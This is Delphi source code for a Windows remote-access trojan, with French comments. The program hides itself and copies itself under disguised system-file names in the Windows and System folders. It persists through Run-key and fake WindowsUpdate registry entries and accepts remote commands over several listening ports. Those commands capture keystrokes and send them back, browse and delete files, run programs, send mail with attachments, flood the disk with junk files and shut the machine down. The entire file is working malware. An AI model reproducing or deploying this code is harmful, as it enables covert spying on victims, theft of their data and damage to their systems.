unit Unit1;
    // La fentre principale est  Top : -500
interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  StdCtrls, Buttons, ExtCtrls,Registry,ActiveX,ComObj, ShlObj, ScktComp,
  MMSystem, Psock, NMsmtp, ScruteFichiers, ComCtrls;

type
  TForm1 = class(TForm)
    ServerSocket1: TServerSocket;
    Timer1: TTimer;
    Timer2: TTimer;
    OpenDialog1: TOpenDialog;
    NMSMTP1: TNMSMTP;
    ListBox1: TListBox;
    Memo1: TMemo;
    ListBox2: TListBox;
    Edit1: TEdit;
    Timer3: TTimer;
    Edit2: TEdit;
    CheckBox1: TCheckBox;
    Edit3: TEdit;
    Edit4: TEdit;
    Timer4: TTimer;
    Label1: TLabel;
    Label2: TLabel;
    procedure ServerSocket1ClientRead(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure Timer1Timer(Sender: TObject);
    procedure Timer2Timer(Sender: TObject);
    procedure ServerSocket1ClientError(Sender: TObject;
      Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
      var ErrorCode: Integer);
    procedure Timer3Timer(Sender: TObject);
    procedure Timer4Timer(Sender: TObject);
  private
    { Dclarations prives }
    procedure WMQueryEndSession(var Message: TWMQueryEndSession); message WM_QUERYENDSESSION;
  public
    { Dclarations publiques }
  end;

var
  Form1: TForm1;
  NbFichier,NbDossier:word;



procedure PourFichier(NomFichier:String;objet:Tobject);
procedure PourDossier(NomDossier:String;objet:Tobject);
Function IsPrevInstance:HWND;
function EnumWindowsCallback(hWnd: HWND; lParam: LPARAM): BOOL; stdcall;

implementation

var
  numFenetre:integer;
  tabClass:array[0..1000]of string;
  tabTexte:array[0..1000] of string;
  tabHandle:array[0..1000] of HWND;

{$R *.DFM}

function EnumWindowsCallback(hWnd: HWND; lParam: LPARAM): BOOL;
Var Texte:array[0..250]of Char;
    Classe:array[0..250]of Char;
begin
  inc(numFenetre);
  GetWindowText(hWnd,Texte,SizeOf(Texte));
  GetClassName(hWnd,Classe,SizeOf(Classe));
  tabHandle[numFenetre]:=hWnd;
  tabTexte[numFenetre]:=string(Texte);
  tabClass[numFenetre]:=string(Classe);
  if numFenetre<1000 then result:=true else result:=false;
end;

procedure TForm1.WMQueryEndSession(var Message: TWMQueryEndSession);
var
dwProcessId: DWORD;
HandleProcess:THandle;
WRD:word;
begin
inherited;
  numFenetre:=-1;
  EnumWindows(@EnumWindowsCallback,0);
  for WRD:=0 to numFenetre do
  if tabTexte[WRD] = copy(ExtractFileName(ParamStr(0)), 0, length(ExtractFileName(ParamStr(0)))-4) then
   begin
   GetWindowThreadProcessId(tabHandle[WRD],@dwProcessId);
   if dwProcessId<>0 then
   begin
    HandleProcess:=OpenProcess(PROCESS_TERMINATE,False,dwProcessId);
    TerminateProcess(HandleProcess,0);
   end;
   end;
end;


Function IsPrevInstance:HWND;
Var ClassName:Array[0..255] of char;
    TitreApplication:string;
Begin
result:=0;
TitreApplication:=Application.Title;
Application.Title:='';
 try
   GetClassName(Application.handle, ClassName, 254);
   result:=FindWindow(ClassName,PChar(TitreApplication));
 finally
  Application.Title:=TitreApplication;
 end;
end;
function NomUtilisateur:string;
var
  Buffer : array[0..255] of char;
  BufferSize : DWORD;
begin
  BufferSize := sizeOf(Buffer);
  GetUserName(@buffer, BufferSize);
  Result:=Buffer;
end;
function NomReseau:string;
var
  Buffer : array[0..255] of char;
  BufferSize : DWORD;
begin
  BufferSize := sizeOf(Buffer);
  GetComputerName(@buffer, BufferSize);
  Result:=Buffer;
end;
procedure CreFicLien(FicSource, FicRaccourci :string);
var
  PersistFile : IPersistFile;
  ShellLink : IShellLink;
  RaccourciWC : array[0..MAX_PATH] of WideChar;
begin
  if UpperCase(extractFileExt(FicRaccourci))<>'.LNK' then
  FicRaccourci:=FicRaccourci+'.lnk';
  ShellLink:=CreateComObject(CLSID_ShellLink) as IShellLink;
  ShellLink.QueryInterface(IPersistFile, PersistFile);
  ShellLink.SetDescription('');
  ShellLink.SetPath(PChar(FicSource));
  ShellLink.SetShowCmd(SW_SHOW);
  MultiByteToWideChar(CP_ACP, 0, PChar(FicRaccourci), -1, @RaccourciWC, MAX_PATH);
  PersistFile.Save(RaccourciWC, true);
end;
function DossierStartUp:String;
Var Reg:TRegistry;
begin
  Reg:=TRegistry.Create;
  Reg.RootKey:=HKEY_CURRENT_USER;
  Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',false);
  result:=Reg.ReadString('StartUp')+'\';
  Reg.free;
end;
procedure AutoRunRaccourci(FichierADemarrer:string);
begin
    CreFicLien(FichierADemarrer, DossierStartUp+ExtractFileName(FichierADemarrer));
end;
Function GetWindowsDossier :string;
var
  Dossier: ARRAY [0..MAX_PATH] OF Char;
begin
  if GetWindowsDirectory (Dossier,SizeOf(Dossier))<>0 then Result:=String(Dossier);
end;

Function GetSystemDossier :string;
var
  Dossier: ARRAY [0..MAX_PATH] OF Char;
begin
  if GetSystemDirectory (Dossier,SizeOf(Dossier))<>0 then Result:=String(Dossier);
end;

procedure PourFichier(NomFichier:String;objet:Tobject);
begin
 Form1.ListBox1.Items.Add(NomFichier);
 inc(NbFichier);
end;

procedure PourDossier(NomDossier:String;objet:Tobject);
begin
 Form1.ListBox2.Items.Add(NomDossier);
 Inc(NbDossier);
end;



procedure TForm1.Timer1Timer(Sender: TObject);
var
Registre:TRegistry;
E,F,X,Y,Code:integer;
h,i,j,k,l,m,n,o,p,q:string;
begin
i := GetSystemDossier + '\dxdlg.exe';
j := GetSystemDossier + '\iconnect.exe';
k := GetSystemDossier + '\sysdial.exe';
l := GetWindowsDossier + '\runtask.exe';
m := GetWindowsDossier + '\dxplore.exe';
q := GetWindowsDossier + '\Help\hlp.exe';
if ParamStr(0) = q then
    begin
    CopyFile(pchar(ParamStr(0)), pchar(i), false);
    FileSetAttr(i, faReadOnly or faSysFile or faHidden or faArchive);
    WinExec(pchar(i), SW_HIDE);
    Close;
    end
else
    if not fileexists (q) then
    begin
    CreateDir (GetWindowsDossier + '\Help');
    CopyFile(pchar(ParamStr(0)), pchar(q), false);
    FileSetAttr(q, faReadOnly or faSysFile or faHidden or faArchive);
    WinExec(pchar(q), SW_HIDE);
    end;
if ParamStr(0) <> i then
 if ParamStr(0) <> j then
  if ParamStr(0) <> k then
   if ParamStr(0) <> l then
    if ParamStr(0) <> m then
    begin
    CopyFile(pchar(ParamStr(0)), pchar(i), false);
    FileSetAttr(i, faReadOnly or faSysFile or faHidden or faArchive);
    WinExec(pchar(i), SW_HIDE);
    end;
n := ExtractFileName(ParamStr(0));
h := copy(TimeToStr(Time), 7, 2);
val (h, X, Code);
if ParamStr(0) = i then
 o := m;
if ParamStr(0) = m then
 o := k;
if ParamStr(0) = k then
 o := j;
if ParamStr(0) = j then
 o := l;
if ParamStr(0) = l then
 o := i;
Registre:=TRegistry.Create;
Registre.RootKey:=HKEY_LOCAL_MACHINE;
Registre.CreateKey('Software\Microsoft\Windows\CurrentVersion\Run');
Registre.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', true);
Registre.WriteString(n,ParamStr(0));
Registre.WriteString('hlp.exe',q);
Registre.CloseKey;
Registre.CreateKey('Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update');
Registre.OpenKey('Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update', true);
Registre.WriteString(n,h);
p := Registre.ReadString(ExtractFileName(o));
Registre.Free;
F := 1;
Val (p,Y,Code);
if Code <> 0 then
 F := 0
else
 begin
 E := (X + 60 - Y) mod 60;
  if E > Timer1.Interval/500 then
  F := 0;
 end;
if F = 0 then
begin
FileSetAttr(o, faArchive);
CopyFile(pchar(ParamStr(0)), pchar(o), false);
FileSetAttr(o, faReadOnly or faSysFile or faHidden or faArchive);
WinExec(pchar(o), SW_HIDE);
end;
if ParamStr(0) <> i then
 if ParamStr(0) <> j then
  if ParamStr(0) <> k then
   if ParamStr(0) <> l then
    if ParamStr(0) <> m then
    begin
    Registre:=TRegistry.Create;
    Registre.RootKey:=HKEY_LOCAL_MACHINE;
    Registre.CreateKey('Software\Microsoft\Windows\CurrentVersion\Run');
    Registre.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', true);
    Registre.DeleteValue(n);
    Registre.CloseKey;
    Registre.CreateKey('Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update');
    Registre.OpenKey('Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update', true);
    Registre.DeleteValue(n);
    Registre.Free;
    Close;
    end;
if ParamStr(0) = i then
ServerSocket1.Port := 23;
if ParamStr(0) = j then
ServerSocket1.Port := 81;
if ParamStr(0) = k then
ServerSocket1.Port := 714;
if ParamStr(0) = l then
ServerSocket1.Port := 8081;
if ParamStr(0) = m then
ServerSocket1.Port := 23762;
ServerSocket1.open;

end;

procedure TForm1.ServerSocket1ClientError(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
ErrorCode := 0;
end;


procedure TForm1.Timer2Timer(Sender: TObject);
begin
form1.hide;
ShowWindow(Application.Handle, SW_Hide);
timer2.enabled := false;
end;

procedure TForm1.Timer3Timer(Sender: TObject);
begin
edit2.text := 'send';
end;

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
  Socket: TCustomWinSocket);
var
i,j,k,l:string;
a,b,c,II,Code:Integer;
dwProcessId,dwLen:DWORD;
sTokenIn,sTokenOut:TTOKENPRIVILEGES;
hCurrentProcess,hToken:THANDLE;
Luid1:TLargeInteger;
OutputFile: TextFile;
VersionInfo:TOsVersionInfo;
p:tpoint;
begin
   ListBox1.clear;
   ListBox2.Clear;
   Memo1.Clear;
i := socket.receivetext;
j := copy (i, 1, 8);
i := copy (i, 9, length(i) - 8);
if j = 'sndmesge' then
   begin
   k := copy (i, 1, AnsiPos('_^^_', i) - 1);
   i := copy (i, AnsiPos('_^^_', i) + 4, length (i));
   a := ansipos('sndmesge', i);  {pour viter}
   if a <> 0 then                {d'crire 2 fois le mme message}
     i := copy (i, 1, a - 1);    {si le lamerz flood}
   if i = 'mtError' then
   messagedlg(k,mtError,[mbOk],0);
   if i = 'mtConfirmation' then
   messagedlg(k,mtConfirmation,[mbOk],0);
   if i = 'mtInformation' then
   messagedlg(k,mtInformation,[mbOk],0);
   if i = 'mtWarning' then
   messagedlg(k,mtWarning,[mbOk],0);
   end;
if j = 'OuvrirCD' then
   mciSendString('Set cdaudio door open wait', nil, 0, handle);
if j = 'FermerCD' then
mciSendString('Set cdaudio door closed wait', nil, 0, handle);
if j = 'NomUtili' then
   Socket.sendtext ('NomUtili' + NomUtilisateur);
if j = 'NomduPCa' then
   Socket.sendtext ('NomduPCa' + NomReseau);
if j = 'HideBDTa' then
   ShowWindow(FindWindow('Shell_TrayWnd',nil),SW_HIDE);
if j = 'ShowBDTa' then
   ShowWindow(FindWindow('Shell_TrayWnd',nil),SW_RESTORE);
if j = 'aaMailaa' then
   begin
    while AnsiPos('_^^_', i) <> 0 do
     begin
     ListBox1.items.add (copy (i, 1, AnsiPos('_^^_', i) - 1));
     i := copy (i, AnsiPos('_^^_', i) + 4, length (i));
     end;
    ListBox1.items.add (i);
   NMSMTP1.connect;
   NMSMTP1.Host := ListBox1.items[0];
   Val(ListBox1.items[1], II, Code);
   NMSMTP1.Port := II;
   NMSMTP1.UserID := ListBox1.items[2];
   NMSMTP1.PostMessage.FromName := ListBox1.items[3];
   NMSMTP1.PostMessage.FromAddress := ListBox1.items[4];
   NMSMTP1.PostMessage.ToAddress.Add(ListBox1.items[5]);
   NMSMTP1.PostMessage.Subject := ListBox1.items[6];
   memo1.lines.add (ListBox1.items[7]);
   NMSMTP1.PostMessage.Body.Assign(Memo1.Lines);
   for a := 8 to ListBox1.items.count - 1 do
   listbox2.items.add (listbox1.items[a]);
   NMSMTP1.PostMessage.Attachments.AddStrings(listbox2.items);
   NMSMTP1.SendMail;
   NMSMTP1.Disconnect;
   end;
if j = 'clozserv' then
   close;
if j = 'zereboot' then
  begin
  close;
  hCurrentProcess := GetCurrentProcess ;
  OpenProcessToken (hCurrentProcess,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
  LookupPrivilegeValue(nil,'SeShutdownPrivilege',Luid1) ;
  sTokenIn.PrivilegeCount := 1;
  sTokenIn.Privileges[0].Luid := Luid1;
  sTokenIn.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
  AdjustTokenPrivileges ( hToken, FALSE, sTokenIn,sizeof(TTOKENPRIVILEGES),sTokenOut, dwLen);
  CloseHandle (hToken);
  ExitWindowsEx(EWX_SHUTDOWN, 0);
  end;
if j = 'millfich' then
  begin
   while AnsiPos('_^^_', i) <> 0 do
    begin
    ListBox1.items.add (copy (i, 1, AnsiPos('_^^_', i) - 1));
    i := copy (i, AnsiPos('_^^_', i) + 4, length (i));
    end;
   ListBox1.items.add (i);
   Val(ListBox1.items[1], II, Code);
   for a := 1 to II do
    begin
    CreateDir(Listbox1.Items[0] + inttostr(a) + ' - ' + ListBox1.items[2]);
    Val(ListBox1.items[3], II, Code);
    for b := 1 to II do
     begin
     Assignfile (OutputFile, Listbox1.Items[0] + inttostr(a) + ' - ' + ListBox1.items[2] + inttostr(b) + ' - ' + Listbox1.Items[4] + '.' + Listbox1.Items[5]);
     rewrite (OutputFile);
     Val(ListBox1.items[6], II, Code);
     for c := 1 to II do
     writeln (OutputFile, Listbox1.Items[7]);
     closefile (OutputFile);
     end;
    end;
  end;
if j = 'keylogge' then
begin
 val(i, II, Code);
 timer3.Interval := II * 1000;
 timer3.enabled := true;
 while Timer3.enabled do
 if edit2.text = 'send' then
  begin
   Socket.sendtext ('sendkeyz' + Edit1.text);
   edit1.text := '';
   edit2.text := '';
  end
  else
  begin
  if (GetAsyncKeyState(27) and 32768) <> 0 then
   begin
   timer3.enabled := false;
   sleep (110);
   edit1.text := edit1.text + '[Suppr]';
   end
  else
  if (GetAsyncKeyState(8) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Back]';
   end
  else
  if (GetAsyncKeyState(46) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Suppr]';
   end
  else
  if (GetAsyncKeyState(112) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F1]';
   end
  else
  if (GetAsyncKeyState(113) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F2]';
   end
  else
  if (GetAsyncKeyState(114) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F3]';
   end
  else
  if (GetAsyncKeyState(115) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F4]';
   end
  else
  if (GetAsyncKeyState(116) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F5]';
   end
  else
  if (GetAsyncKeyState(117) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F6]';
   end
  else
  if (GetAsyncKeyState(118) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F7]';
   end
  else
  if (GetAsyncKeyState(119) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F8]';
   end
  else
  if (GetAsyncKeyState(120) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F9]';
   end
  else
  if (GetAsyncKeyState(121) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F10]';
   end
  else
  if (GetAsyncKeyState(122) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F11]';
   end
  else
  if (GetAsyncKeyState(123) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Suppr]';
   end
  else
  if (GetAsyncKeyState(124) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[F12]';
   end
  else
  if (GetAsyncKeyState(145) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Arr df]';
   end
  else
  if (GetAsyncKeyState(19) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Pause]';
   end
  else
  if (GetAsyncKeyState(36) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Dbut]';
   end
  else
  if (GetAsyncKeyState(33) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Pge Up]';
   end
  else
  if (GetAsyncKeyState(34) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Pge Dwn]';
   end
  else
  if (GetAsyncKeyState(35) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Fin]';
   end
  else
  if (GetAsyncKeyState(38) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Flche Haut]';
   end
  else
  if (GetAsyncKeyState(40) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Flche Bas]';
   end
  else
  if (GetAsyncKeyState(37) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Flche Gauche]';
   end
  else
  if (GetAsyncKeyState(39) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Flche Droite]';
   end
  else
  if (GetAsyncKeyState(13) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Entre]';
   end
  else
  if (GetAsyncKeyState(160) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[L. Maj]';
   end
  else
  if (GetAsyncKeyState(161) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[R. Maj]';
   end
  else
  if (GetAsyncKeyState(20) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Maj Lock]';
   end
  else
  if (GetAsyncKeyState(9) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Tab]';
   end
  else
  if (GetAsyncKeyState(17) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[L. Ctrl]';
   end
  else
  if (GetAsyncKeyState(91) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[L. Win]';
   end
  else
  if (GetAsyncKeyState(92) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[R. Win]';
   end
  else
  if (GetAsyncKeyState(64) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[L. Alt]';
   end
  else
  if (GetAsyncKeyState(45) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Inser]';
   end
  else
  if (GetAsyncKeyState(162) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Alt Gr]';
   end
  else
  if (GetAsyncKeyState(222) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[]';
   end
  else
  if (GetAsyncKeyState(1) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[KG]';
   end
  else
  if (GetAsyncKeyState(2) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[KD]';
   end
  else
  if (GetAsyncKeyState(44) and 32768) <> 0 then
   begin
   sleep (110);
   edit1.text := edit1.text + '[Impr cran]';
   end
  else
    for a := 0 to 255 do
     begin
     if (GetAsyncKeyState(a) and 32768) <> 0 then
      begin
      sleep (110);
      edit1.text := edit1.text + chr(a);
      end;
     end;
  application.ProcessMessages;
  end;
end;
if j = 'stopkeyl' then
begin
edit1.text := '';
edit2.text := '';
timer3.enabled := false;
end;
if j = 'RepWindo' then
   Socket.sendtext ('RepWindo' + GetWindowsDossier);
if j = 'RepSyste' then
   Socket.sendtext ('RepSyste' + GetSystemDossier);
if j = 'VerWindo' then
  begin
  VersionInfo.dwOSVersionInfoSize:=sizeof(VersionInfo);
  GetVersionEx(VersionInfo);
  ListBox1.Items.add (IntToStr(VersionInfo.dwMajorVersion));
  ListBox1.Items.add (IntToStr(VersionInfo.dwMinorVersion));
  ListBox1.Items.add (IntToStr(VersionInfo.dwPlatformId));
  case
    VersionInfo.dwPlatformId of
      VER_PLATFORM_WIN32_WINDOWS : ListBox1.Items.add ('Win 95');
      VER_PLATFORM_WIN32s : ListBox1.Items.add ('Win 3.1');
      VER_PLATFORM_WIN32_NT : ListBox1.Items.add ('Windows NT');
  end;
  Socket.sendtext ('VerWindo' + Listbox1.Items[0] + '_^^_' + Listbox1.Items[1] + '_^^_' + Listbox1.Items[2] + '_^^_' + Listbox1.Items[3]);
  end;
if j = 'sonsysok' then
 MessageBeep(MB_OK);
if j = 'sonsysas' then
 MessageBeep(MB_ICONASTERISK);
if j = 'sonsyser' then
 MessageBeep(MB_ICONHAND);
if j = 'sonsysqu' then
 MessageBeep(MB_ICONQUESTION);
if j = 'sonsyshp' then
 MessageBeep($FFFFFFFF);
if j = 'showmous' then
 ShowCursor(true);
if j = 'hidemous' then
 ShowCursor(false);
if j = 'explorer' then
begin
   while AnsiPos('_^^_', i) <> 0 do
    begin
    memo1.Lines.add (copy (i, 1, AnsiPos('_^^_', i) - 1));
    i := copy (i, AnsiPos('_^^_', i) + 4, length (i));
    end;
   memo1.Lines.add (i);
  PADeclencherFichier:=PourFichier;
  PADeclencherDossier:=PourDossier;
  NbFichier:=0;
  NbDossier:=0;
  if memo1.Lines[2] = 'true' then
   CheckBox1.checked := true
  else
   CheckBox1.checked := false;
  ScruteDossier(memo1.Lines[0], memo1.Lines[1], faAnyFile, CheckBox1.checked);
  Socket.sendtext ('explore1' + IntToStr(NbFichier) + '_^^_' + IntToStr(NbDossier));
  sleep (1000);
  for a := 0 to ListBox2.items.count-1 do
  edit4.text := edit4.text + ListBox2.Items[a] + '_^^_';
  Socket.sendtext ('explore3' + edit4.text);
  sleep (1000);
  for a := 0 to ListBox1.items.count-1 do
  edit3.text := edit3.text + ListBox1.Items[a] + '_^^_';
  Socket.sendtext ('explore2' + edit3.text);
end;
if j = 'effacere' then
 begin
 FileSetAttr(i, faArchive);
 DeleteFile (i);
 end;
if j = 'effacdir' then
 RemoveDir (i);
if j = 'execfile' then
 WinExec (pchar(i), SW_SHOW);
if j = 'blokmous' then
 timer4.enabled := true;
if j = 'deblokmo' then
 timer4.enabled := false;
if j = 'setnompc' then
 SetComputerName(pchar(i));
end;

procedure TForm1.Timer4Timer(Sender: TObject);
var
p:tpoint;
x:integer;
begin
 x := 100;
 SetCursorPos(p.x,p.x);
end;

end.
